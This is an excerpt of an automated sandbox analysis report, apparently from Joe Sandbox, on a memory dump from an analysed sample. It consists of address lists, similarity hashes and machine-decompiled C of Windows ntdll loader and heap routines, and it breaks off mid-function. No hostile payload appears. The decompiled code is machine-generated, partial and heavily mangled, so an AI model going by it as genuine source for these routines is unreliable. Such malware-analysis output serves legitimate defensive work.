                                                                                                                                                                            0x1d8d0219
                                                                                                                                                                            0x1d8d0224
                                                                                                                                                                            0x1d8d017e
                                                                                                                                                                            0x1d8d017e
                                                                                                                                                                            0x1d8d0184
                                                                                                                                                                            0x1d8d0188
                                                                                                                                                                            0x1d8d018e
                                                                                                                                                                            0x1d8d0195
                                                                                                                                                                            0x1d8d019b
                                                                                                                                                                            0x1d8d019c
                                                                                                                                                                            0x1d8d019c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8d0188
                                                                                                                                                                            0x1d8d013b
                                                                                                                                                                            0x1d8d013e
                                                                                                                                                                            0x1d8d015d
                                                                                                                                                                            0x1d8d0162
                                                                                                                                                                            0x1d8d0140
                                                                                                                                                                            0x1d8d0155
                                                                                                                                                                            0x1d8d015a
                                                                                                                                                                            0x1d8d0168
                                                                                                                                                                            0x1d8d0176
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8cfef6
                                                                                                                                                                            0x1d8cfef6
                                                                                                                                                                            0x1d8cfefc
                                                                                                                                                                            0x1d8cff02
                                                                                                                                                                            0x1d8cff70
                                                                                                                                                                            0x1d8cff73
                                                                                                                                                                            0x1d8cff76
                                                                                                                                                                            0x1d8cff7b
                                                                                                                                                                            0x1d8d0068
                                                                                                                                                                            0x1d8d0070
                                                                                                                                                                            0x1d8d0075
                                                                                                                                                                            0x1d8d0078
                                                                                                                                                                            0x1d8d007a
                                                                                                                                                                            0x1d8d0080
                                                                                                                                                                            0x1d8d0080
                                                                                                                                                                            0x1d8d0083
                                                                                                                                                                            0x1d8d0087
                                                                                                                                                                            0x1d8d0090
                                                                                                                                                                            0x1d8d0090
                                                                                                                                                                            0x1d8d0090
                                                                                                                                                                            0x1d8d0092
                                                                                                                                                                            0x1d8d0094
                                                                                                                                                                            0x1d8d0097
                                                                                                                                                                            0x1d8d009a
                                                                                                                                                                            0x1d8d009f
                                                                                                                                                                            0x1d8d00a9
                                                                                                                                                                            0x1d8d00ac
                                                                                                                                                                            0x1d8d00ae
                                                                                                                                                                            0x1d8d00af
                                                                                                                                                                            0x1d8d00b3
                                                                                                                                                                            0x1d8d00b3
                                                                                                                                                                            0x1d8d00ac
                                                                                                                                                                            0x1d8d00b8
                                                                                                                                                                            0x1d8d00bc
                                                                                                                                                                            0x1d8d00ec
                                                                                                                                                                            0x1d8d00ef
                                                                                                                                                                            0x1d8d00f2
                                                                                                                                                                            0x1d8d00be
                                                                                                                                                                            0x1d8d00c0
                                                                                                                                                                            0x1d8d00c5
                                                                                                                                                                            0x1d8d00ca
                                                                                                                                                                            0x1d8d00d1
                                                                                                                                                                            0x1d8d00e3
                                                                                                                                                                            0x1d8d00d3
                                                                                                                                                                            0x1d8d00d4
                                                                                                                                                                            0x1d8d00d9
                                                                                                                                                                            0x1d8d00dc
                                                                                                                                                                            0x1d8d00df
                                                                                                                                                                            0x1d8d00df
                                                                                                                                                                            0x1d8d00e6
                                                                                                                                                                            0x1d8d00e6
                                                                                                                                                                            0x1d8d00f5
                                                                                                                                                                            0x1d8d00f9
                                                                                                                                                                            0x1d8d00fc
                                                                                                                                                                            0x1d8d0108
                                                                                                                                                                            0x1d8d010e
                                                                                                                                                                            0x1d8d010e
                                                                                                                                                                            0x1d8d010e
                                                                                                                                                                            0x1d8d00fc
                                                                                                                                                                            0x1d8d0114
                                                                                                                                                                            0x1d8d0119
                                                                                                                                                                            0x1d8d011d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8d011d
                                                                                                                                                                            0x1d8cff81
                                                                                                                                                                            0x1d8cff88
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8cff8e
                                                                                                                                                                            0x1d8cff91
                                                                                                                                                                            0x1d8cff94
                                                                                                                                                                            0x1d8cff97
                                                                                                                                                                            0x1d8cff9c
                                                                                                                                                                            0x1d8cffa6
                                                                                                                                                                            0x1d8cffa9
                                                                                                                                                                            0x1d8cffab
                                                                                                                                                                            0x1d8cffb0
                                                                                                                                                                            0x1d8cffb5
                                                                                                                                                                            0x1d8cffb5
                                                                                                                                                                            0x1d8cffa9
                                                                                                                                                                            0x1d8cffb8
                                                                                                                                                                            0x1d8cffbc
                                                                                                                                                                            0x1d8cffce
                                                                                                                                                                            0x1d8cffd1
                                                                                                                                                                            0x1d8cffd4
                                                                                                                                                                            0x1d8cffbe
                                                                                                                                                                            0x1d8cffc0
                                                                                                                                                                            0x1d8cffc5
                                                                                                                                                                            0x1d8cffc8
                                                                                                                                                                            0x1d8cffc8
                                                                                                                                                                            0x1d8cffd7
                                                                                                                                                                            0x1d8cffd9
                                                                                                                                                                            0x1d8cffdd
                                                                                                                                                                            0x1d8cffe0
                                                                                                                                                                            0x1d8cffea
                                                                                                                                                                            0x1d8cfff0
                                                                                                                                                                            0x1d8cfff0
                                                                                                                                                                            0x1d8cfff0
                                                                                                                                                                            0x1d8cfff2
                                                                                                                                                                            0x1d8cfff5
                                                                                                                                                                            0x1d8d0065
                                                                                                                                                                            0x1d8d0065
                                                                                                                                                                            0x1d8cfff7
                                                                                                                                                                            0x1d8cfff7
                                                                                                                                                                            0x1d8cfffe
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8d0004
                                                                                                                                                                            0x1d8d000b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8d000d
                                                                                                                                                                            0x1d8d0013
                                                                                                                                                                            0x1d8d0016
                                                                                                                                                                            0x1d8d0035
                                                                                                                                                                            0x1d8d003a
                                                                                                                                                                            0x1d8d0018
                                                                                                                                                                            0x1d8d002d
                                                                                                                                                                            0x1d8d0032
                                                                                                                                                                            0x1d8d0040
                                                                                                                                                                            0x1d8d004b
                                                                                                                                                                            0x1d8d004c
                                                                                                                                                                            0x1d8d004f
                                                                                                                                                                            0x1d8d0058
                                                                                                                                                                            0x1d8d005d
                                                                                                                                                                            0x1d8cff47
                                                                                                                                                                            0x1d8cff47
                                                                                                                                                                            0x1d8cff4d
                                                                                                                                                                            0x1d8cff51
                                                                                                                                                                            0x1d8cff57
                                                                                                                                                                            0x1d8cff5e
                                                                                                                                                                            0x1d8cff64
                                                                                                                                                                            0x1d8cff65
                                                                                                                                                                            0x1d8cff65
                                                                                                                                                                            0x1d8cff51
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8cfff5
                                                                                                                                                                            0x1d8cff04
                                                                                                                                                                            0x1d8cff07
                                                                                                                                                                            0x1d8cff26
                                                                                                                                                                            0x1d8cff2b
                                                                                                                                                                            0x1d8cff09
                                                                                                                                                                            0x1d8cff1e
                                                                                                                                                                            0x1d8cff23
                                                                                                                                                                            0x1d8cff31
                                                                                                                                                                            0x1d8cff3f
                                                                                                                                                                            0x1d8cff44
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8cff44
                                                                                                                                                                            0x1d8cfe18
                                                                                                                                                                            0x1d8cfe20
                                                                                                                                                                            0x1d8cfe28
                                                                                                                                                                            0x1d8cfe2e
                                                                                                                                                                            0x1d8d02d1
                                                                                                                                                                            0x1d8d02d4
                                                                                                                                                                            0x1d8d02e0
                                                                                                                                                                            0x1d8d02e0

                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.1344068848.000000001D7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7F0000, based on PE: true
                                                                                                                                                                            • Associated: 0000000B.00000002.1346656449.000000001D919000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d7f0000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                                            • API String ID: 3446177414-1700792311
                                                                                                                                                                            • Opcode ID: 0562777dba1ee986ea891280545b86bee1be3c5883a37aaa21c0d75458455e80
                                                                                                                                                                            • Instruction ID: 24c615cd572767de4f626fc9fe7177c4f0a5cf0b8c7123a24db0ae0b1f387da8
                                                                                                                                                                            • Opcode Fuzzy Hash: 0562777dba1ee986ea891280545b86bee1be3c5883a37aaa21c0d75458455e80
                                                                                                                                                                            • Instruction Fuzzy Hash: 01D1F035909A95EFCB02CFA8C440BBDBBF1FF4A760F058149E4559B3A2C735A946CB12
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 41%
                                                                                                                                                                            			E1D854C3D(void* __ecx) {
                                                                                                                                                                            				char _v8;
                                                                                                                                                                            				intOrPtr* _t24;
                                                                                                                                                                            				intOrPtr _t27;
                                                                                                                                                                            				intOrPtr _t36;
                                                                                                                                                                            				void* _t39;
                                                                                                                                                                            				intOrPtr _t40;
                                                                                                                                                                            				void* _t42;
                                                                                                                                                                            				void* _t45;
                                                                                                                                                                            				void* _t47;
                                                                                                                                                                            				intOrPtr* _t48;
                                                                                                                                                                            				void* _t49;
                                                                                                                                                                            				intOrPtr _t51;
                                                                                                                                                                            
                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                            				_t45 = 0;
                                                                                                                                                                            				_t42 = __ecx;
                                                                                                                                                                            				_t51 =  *0x1d9165e4; // 0x767ff0e0
                                                                                                                                                                            				if(_t51 == 0) {
                                                                                                                                                                            					L10:
                                                                                                                                                                            					return _t45;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t40 =  *((intOrPtr*)(__ecx + 0x18));
                                                                                                                                                                            				_t36 =  *0x1d915b24; // 0x17b2ce0
                                                                                                                                                                            				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t36) {
                                                                                                                                                                            					_t24 =  *((intOrPtr*)(_t42 + 0x28));
                                                                                                                                                                            					if(_t42 == _t36) {
                                                                                                                                                                            						_t47 = 0x5c;
                                                                                                                                                                            						if( *_t24 == _t47) {
                                                                                                                                                                            							_t39 = 0x3f;
                                                                                                                                                                            							if( *((intOrPtr*)(_t24 + 2)) == _t39 &&  *((intOrPtr*)(_t24 + 4)) == _t39 &&  *((intOrPtr*)(_t24 + 6)) == _t47 &&  *((intOrPtr*)(_t24 + 8)) != 0 &&  *((short*)(_t24 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t24 + 0xc)) == _t47) {
                                                                                                                                                                            								_t24 = _t24 + 8;
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					_t48 =  *0x1d9165e4; // 0x767ff0e0
                                                                                                                                                                            					 *0x1d9191e0(_t40, _t24,  &_v8);
                                                                                                                                                                            					_t45 =  *_t48();
                                                                                                                                                                            					if(_t45 >= 0) {
                                                                                                                                                                            						L8:
                                                                                                                                                                            						_t27 = _v8;
                                                                                                                                                                            						if(_t27 != 0) {
                                                                                                                                                                            							if( *((intOrPtr*)(_t42 + 0x48)) != 0) {
                                                                                                                                                                            								E1D8226A0(_t27,  *((intOrPtr*)(_t42 + 0x48)));
                                                                                                                                                                            								_t27 = _v8;
                                                                                                                                                                            							}
                                                                                                                                                                            							 *((intOrPtr*)(_t42 + 0x48)) = _t27;
                                                                                                                                                                            						}
                                                                                                                                                                            						if(_t45 < 0) {
                                                                                                                                                                            							if(( *0x1d9137c0 & 0x00000003) != 0) {
                                                                                                                                                                            								E1D89E692("minkernel\\ntdll\\ldrsnap.c", 0x2eb, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t45);
                                                                                                                                                                            							}
                                                                                                                                                                            							if(( *0x1d9137c0 & 0x00000010) != 0) {
                                                                                                                                                                            								asm("int3");
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L10;
                                                                                                                                                                            					}
                                                                                                                                                                            					if(_t45 != 0xc000008a) {
                                                                                                                                                                            						if(_t45 != 0xc000008b && _t45 != 0xc0000089 && _t45 != 0xc000000f && _t45 != 0xc0000204 && _t45 != 0xc0000002) {
                                                                                                                                                                            							if(_t45 != 0xc00000bb) {
                                                                                                                                                                            								goto L8;
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					if(( *0x1d9137c0 & 0x00000005) != 0) {
                                                                                                                                                                            						_push(_t45);
                                                                                                                                                                            						_t18 = _t42 + 0x24; // 0x123
                                                                                                                                                                            						E1D89E692("minkernel\\ntdll\\ldrsnap.c", 0x2ce, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t18);
                                                                                                                                                                            						_t49 = _t49 + 0x1c;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t45 = 0;
                                                                                                                                                                            					goto L8;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					goto L10;
                                                                                                                                                                            				}
                                                                                                                                                                            			}















                                                                                                                                                                            0x1d854c42
                                                                                                                                                                            0x1d854c47
                                                                                                                                                                            0x1d854c4a
                                                                                                                                                                            0x1d854c4c
                                                                                                                                                                            0x1d854c52
                                                                                                                                                                            0x1d854cb8
                                                                                                                                                                            0x1d854cbe
                                                                                                                                                                            0x1d854cbe
                                                                                                                                                                            0x1d854c5a
                                                                                                                                                                            0x1d854c5d
                                                                                                                                                                            0x1d854c69
                                                                                                                                                                            0x1d854c6f
                                                                                                                                                                            0x1d854c74
                                                                                                                                                                            0x1d854cd6
                                                                                                                                                                            0x1d854cda
                                                                                                                                                                            0x1d8933b9
                                                                                                                                                                            0x1d8933be
                                                                                                                                                                            0x1d8933f7
                                                                                                                                                                            0x1d8933f7
                                                                                                                                                                            0x1d8933be
                                                                                                                                                                            0x1d854cda
                                                                                                                                                                            0x1d854c76
                                                                                                                                                                            0x1d854c84
                                                                                                                                                                            0x1d854c8c
                                                                                                                                                                            0x1d854c90
                                                                                                                                                                            0x1d854ca9
                                                                                                                                                                            0x1d854ca9
                                                                                                                                                                            0x1d854cae
                                                                                                                                                                            0x1d854ce4
                                                                                                                                                                            0x1d854cee
                                                                                                                                                                            0x1d854cf3
                                                                                                                                                                            0x1d854cf3
                                                                                                                                                                            0x1d854ce6
                                                                                                                                                                            0x1d854ce6
                                                                                                                                                                            0x1d854cb2
                                                                                                                                                                            0x1d893463
                                                                                                                                                                            0x1d89347b
                                                                                                                                                                            0x1d893480
                                                                                                                                                                            0x1d89348a
                                                                                                                                                                            0x1d893490
                                                                                                                                                                            0x1d893490
                                                                                                                                                                            0x1d89348a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d854cb2
                                                                                                                                                                            0x1d854c98
                                                                                                                                                                            0x1d854cc5
                                                                                                                                                                            0x1d893429
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d89342f
                                                                                                                                                                            0x1d854cc5
                                                                                                                                                                            0x1d854ca1
                                                                                                                                                                            0x1d893434
                                                                                                                                                                            0x1d893435
                                                                                                                                                                            0x1d89344f
                                                                                                                                                                            0x1d893454
                                                                                                                                                                            0x1d893454
                                                                                                                                                                            0x1d854ca7
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            • Querying the active activation context failed with status 0x%08lx, xrefs: 1D893466
                                                                                                                                                                            • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 1D893439
                                                                                                                                                                            • LdrpFindDllActivationContext, xrefs: 1D893440, 1D89346C
                                                                                                                                                                            • minkernel\ntdll\ldrsnap.c, xrefs: 1D89344A, 1D893476
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.1344068848.000000001D7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7F0000, based on PE: true
                                                                                                                                                                            • Associated: 0000000B.00000002.1346656449.000000001D919000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d7f0000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                            • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                                                                                            • API String ID: 3446177414-3779518884
                                                                                                                                                                            • Opcode ID: 6159e53a892d668c7752eae0707bd8acf45a21c52b0f05dba345ef11a9899c8f
                                                                                                                                                                            • Instruction ID: cbf763d82d9f17424fe98f9e5a13041a3ac042cb8d8ed4dd9ff9c39f92de8c15
                                                                                                                                                                            • Opcode Fuzzy Hash: 6159e53a892d668c7752eae0707bd8acf45a21c52b0f05dba345ef11a9899c8f
                                                                                                                                                                            • Instruction Fuzzy Hash: 2F31C472B04296FBDB129B0C8884B7AB3A4BBC17A4F43816AF85557251D770AD84C393
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                            			E1D830680(intOrPtr __ecx, signed int* __edx) {
                                                                                                                                                                            				signed int* _v8;
                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                            				char _v20;
                                                                                                                                                                            				intOrPtr* _v24;
                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                            				signed char _v56;
                                                                                                                                                                            				char _v60;
                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                            				signed char _t136;
                                                                                                                                                                            				signed int _t141;
                                                                                                                                                                            				void* _t143;
                                                                                                                                                                            				signed int* _t145;
                                                                                                                                                                            				signed int* _t146;
                                                                                                                                                                            				intOrPtr _t148;
                                                                                                                                                                            				unsigned int _t150;
                                                                                                                                                                            				char _t162;
                                                                                                                                                                            				signed int* _t164;
                                                                                                                                                                            				signed char* _t165;
                                                                                                                                                                            				intOrPtr _t166;
                                                                                                                                                                            				signed int* _t168;
                                                                                                                                                                            				signed char* _t169;
                                                                                                                                                                            				signed char* _t171;
                                                                                                                                                                            				signed char* _t180;
                                                                                                                                                                            				intOrPtr _t195;
                                                                                                                                                                            				signed int _t197;
                                                                                                                                                                            				signed int _t209;
                                                                                                                                                                            				signed char _t210;
                                                                                                                                                                            				intOrPtr* _t215;
                                                                                                                                                                            				intOrPtr _t222;
                                                                                                                                                                            				signed int _t232;
                                                                                                                                                                            				intOrPtr* _t242;
                                                                                                                                                                            				intOrPtr _t244;
                                                                                                                                                                            				unsigned int _t245;
                                                                                                                                                                            				intOrPtr _t247;
                                                                                                                                                                            				intOrPtr* _t258;
                                                                                                                                                                            				signed char _t264;
                                                                                                                                                                            				unsigned int _t269;
                                                                                                                                                                            				intOrPtr _t271;
                                                                                                                                                                            				signed int* _t276;
                                                                                                                                                                            				signed int _t277;
                                                                                                                                                                            				void* _t278;
                                                                                                                                                                            				intOrPtr _t281;
                                                                                                                                                                            				signed int* _t287;
                                                                                                                                                                            				intOrPtr _t288;
                                                                                                                                                                            				unsigned int _t291;
                                                                                                                                                                            				unsigned int* _t295;
                                                                                                                                                                            				intOrPtr* _t298;
                                                                                                                                                                            				intOrPtr _t300;
                                                                                                                                                                            
                                                                                                                                                                            				_t231 = __edx;
                                                                                                                                                                            				_v8 = __edx;
                                                                                                                                                                            				_t300 = __ecx;
                                                                                                                                                                            				_t298 = E1D830ACE(__edx,  *__edx);
                                                                                                                                                                            				if(_t298 == __ecx + 0x8c) {
                                                                                                                                                                            					L45:
                                                                                                                                                                            					return 0;
                                                                                                                                                                            				}
                                                                                                                                                                            				if( *0x1d916960 >= 1) {
                                                                                                                                                                            					__eflags =  *(_t298 + 0x14) -  *__edx;
                                                                                                                                                                            					if(__eflags < 0) {
                                                                                                                                                                            						_t222 =  *[fs:0x30];
                                                                                                                                                                            						__eflags =  *(_t222 + 0xc);
                                                                                                                                                                            						if( *(_t222 + 0xc) == 0) {
                                                                                                                                                                            							_push("HEAP: ");
                                                                                                                                                                            							E1D81B910();
                                                                                                                                                                            						} else {
                                                                                                                                                                            							E1D81B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                                                                            						}
                                                                                                                                                                            						_push("(UCRBlock->Size >= *Size)");
                                                                                                                                                                            						E1D81B910();
                                                                                                                                                                            						__eflags =  *0x1d915da8;
                                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                                            							E1D8DFC95(_t231, 1, _t298, __eflags);
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				_t136 =  *((intOrPtr*)(_t298 - 2));
                                                                                                                                                                            				_t4 = _t298 - 8; // -8
                                                                                                                                                                            				_t232 = _t4;
                                                                                                                                                                            				if(_t136 != 0) {
                                                                                                                                                                            					_v12 = (_t232 & 0xffff0000) - ((_t136 & 0x000000ff) << 0x10) + 0x10000;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_v12 = _t300;
                                                                                                                                                                            				}
                                                                                                                                                                            				_v20 =  *((intOrPtr*)(_t298 + 0x10));
                                                                                                                                                                            				_t141 =  *(_t300 + 0xcc) ^  *0x1d916d48;
                                                                                                                                                                            				_v28 = _t141;
                                                                                                                                                                            				if(_t141 != 0) {
                                                                                                                                                                            					 *0x1d9191e0(_t300,  &_v20, _v8);
                                                                                                                                                                            					_t143 = _v28();
                                                                                                                                                                            					_t276 = _v8;
                                                                                                                                                                            					goto L13;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t295 = _v8;
                                                                                                                                                                            					if( *(_t298 + 0x14) -  *_t295 <=  *(_t300 + 0x6c) << 3) {
                                                                                                                                                                            						_t269 =  *(_t298 + 0x14);
                                                                                                                                                                            						__eflags = _t269 -  *(_t300 + 0x5c) << 3;
                                                                                                                                                                            						if(__eflags < 0) {
                                                                                                                                                                            							 *_t295 = _t269;
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					if(( *(_t300 + 0x40) & 0x00040000) != 0) {
                                                                                                                                                                            						_push(0);
                                                                                                                                                                            						_push(0x1c);
                                                                                                                                                                            						_v16 = 0x40;
                                                                                                                                                                            						_push( &_v60);
                                                                                                                                                                            						_push(3);
                                                                                                                                                                            						_push(_t300);
                                                                                                                                                                            						_push(0xffffffff);
                                                                                                                                                                            						_t209 = E1D862BE0();
                                                                                                                                                                            						__eflags = _t209;
                                                                                                                                                                            						_t210 = _v56;
                                                                                                                                                                            						if(_t209 < 0) {
                                                                                                                                                                            							L61:
                                                                                                                                                                            							__eflags = 0;
                                                                                                                                                                            							E1D8E5FED(0, _t300, 1, _t210, 0, 0);
                                                                                                                                                                            							_v16 = 4;
                                                                                                                                                                            							L62:
                                                                                                                                                                            							_t276 = _v8;
                                                                                                                                                                            							goto L8;
                                                                                                                                                                            						}
                                                                                                                                                                            						__eflags = _t210 & 0x00000060;
                                                                                                                                                                            						if((_t210 & 0x00000060) == 0) {
                                                                                                                                                                            							goto L61;
                                                                                                                                                                            						}
                                                                                                                                                                            						__eflags = _v60 - _t300;
                                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                                            							goto L62;
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L61;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_v16 = 4;
                                                                                                                                                                            						L8:
                                                                                                                                                                            						_v32 =  *_t276;
                                                                                                                                                                            						_v28 =  *((intOrPtr*)(_t300 + 0x1f8)) -  *((intOrPtr*)(_t300 + 0x244));
                                                                                                                                                                            						_t215 = _t300 + 0xd4;
                                                                                                                                                                            						_v24 = _t215;
                                                                                                                                                                            						if( *0x1d91373c != 0) {
                                                                                                                                                                            							L11:
                                                                                                                                                                            							_push(_v16);
                                                                                                                                                                            							_push(0x1000);
                                                                                                                                                                            							_push(_t276);
                                                                                                                                                                            							_push(0);
                                                                                                                                                                            							_push( &_v20);
                                                                                                                                                                            							_push(0xffffffff);
                                                                                                                                                                            							_t143 = E1D862B10();
                                                                                                                                                                            							_t276 = _v8;
                                                                                                                                                                            							L12:
                                                                                                                                                                            							 *((intOrPtr*)(_t300 + 0x21c)) =  *((intOrPtr*)(_t300 + 0x21c)) + 1;
                                                                                                                                                                            							L13:
                                                                                                                                                                            							if(_t143 < 0) {
                                                                                                                                                                            								 *((intOrPtr*)(_t300 + 0x224)) =  *((intOrPtr*)(_t300 + 0x224)) + 1;
                                                                                                                                                                            								goto L45;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t145 =  *( *[fs:0x30] + 0x50);
                                                                                                                                                                            							if(_t145 != 0) {
                                                                                                                                                                            								__eflags =  *_t145;
                                                                                                                                                                            								if(__eflags == 0) {
                                                                                                                                                                            									goto L15;
                                                                                                                                                                            								}
                                                                                                                                                                            								_t146 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
                                                                                                                                                                            								L16:
                                                                                                                                                                            								if( *_t146 != 0) {
                                                                                                                                                                            									__eflags =  *( *[fs:0x30] + 0x240) & 0x00000001;
                                                                                                                                                                            									if(__eflags != 0) {
                                                                                                                                                                            										E1D8DEFD3(_t232, _t300, _v20,  *_t276, 2);
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            								if( *((intOrPtr*)(_t300 + 0x4c)) != 0) {
                                                                                                                                                                            									_t291 =  *(_t300 + 0x50) ^  *_t232;
                                                                                                                                                                            									 *_t232 = _t291;
                                                                                                                                                                            									_t264 = _t291 >> 0x00000010 ^ _t291 >> 0x00000008 ^ _t291;
                                                                                                                                                                            									if(_t291 >> 0x18 != _t264) {
                                                                                                                                                                            										_push(_t264);
                                                                                                                                                                            										E1D8DD646(_t232, _t300, _t232, _t298, _t300, __eflags);
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            								 *((char*)(_t232 + 2)) = 0;
                                                                                                                                                                            								 *((char*)(_t232 + 7)) = 0;
                                                                                                                                                                            								_t148 =  *((intOrPtr*)(_t298 + 8));
                                                                                                                                                                            								_t242 =  *((intOrPtr*)(_t298 + 0xc));
                                                                                                                                                                            								_t277 =  *((intOrPtr*)(_t148 + 4));
                                                                                                                                                                            								_v32 = _t277;
                                                                                                                                                                            								_t38 = _t298 + 8; // 0x8
                                                                                                                                                                            								_t278 = _t38;
                                                                                                                                                                            								if( *_t242 != _t277 ||  *_t242 != _t278) {
                                                                                                                                                                            									E1D8E5FED(0xd, 0, _t278, _v32,  *_t242, 0);
                                                                                                                                                                            								} else {
                                                                                                                                                                            									 *_t242 = _t148;
                                                                                                                                                                            									 *((intOrPtr*)(_t148 + 4)) = _t242;
                                                                                                                                                                            								}
                                                                                                                                                                            								_t150 =  *(_t298 + 0x14);
                                                                                                                                                                            								if(_t150 == 0) {
                                                                                                                                                                            									L27:
                                                                                                                                                                            									_t244 = _v12;
                                                                                                                                                                            									 *((intOrPtr*)(_t244 + 0x30)) =  *((intOrPtr*)(_t244 + 0x30)) - 1;
                                                                                                                                                                            									 *((intOrPtr*)(_t244 + 0x2c)) =  *((intOrPtr*)(_t244 + 0x2c)) - ( *(_t298 + 0x14) >> 0xc);
                                                                                                                                                                            									 *((intOrPtr*)(_t300 + 0x1f8)) =  *((intOrPtr*)(_t300 + 0x1f8)) +  *(_t298 + 0x14);
                                                                                                                                                                            									 *((intOrPtr*)(_t300 + 0x20c)) =  *((intOrPtr*)(_t300 + 0x20c)) + 1;
                                                                                                                                                                            									 *((intOrPtr*)(_t300 + 0x208)) =  *((intOrPtr*)(_t300 + 0x208)) - 1;
                                                                                                                                                                            									_t245 =  *(_t298 + 0x14);
                                                                                                                                                                            									if(_t245 >= 0x7f000) {
                                                                                                                                                                            										 *((intOrPtr*)(_t300 + 0x1fc)) =  *((intOrPtr*)(_t300 + 0x1fc)) - _t245;
                                                                                                                                                                            										_t245 =  *(_t298 + 0x14);
                                                                                                                                                                            									}
                                                                                                                                                                            									_t280 = _v8;
                                                                                                                                                                            									_t154 =  *_v8;
                                                                                                                                                                            									if(_t245 <=  *_v8) {
                                                                                                                                                                            										_t281 = _v12;
                                                                                                                                                                            										__eflags =  *((intOrPtr*)(_t298 + 0x10)) + _t245 -  *((intOrPtr*)(_t281 + 0x28));
                                                                                                                                                                            										_t280 = _v8;
                                                                                                                                                                            										if( *((intOrPtr*)(_t298 + 0x10)) + _t245 !=  *((intOrPtr*)(_t281 + 0x28))) {
                                                                                                                                                                            											 *_t280 =  *_t280 + ( *_t232 & 0x0000ffff) * 8;
                                                                                                                                                                            											goto L30;
                                                                                                                                                                            										}
                                                                                                                                                                            										_t154 =  *_t280;
                                                                                                                                                                            										goto L29;
                                                                                                                                                                            									} else {
                                                                                                                                                                            										L29:
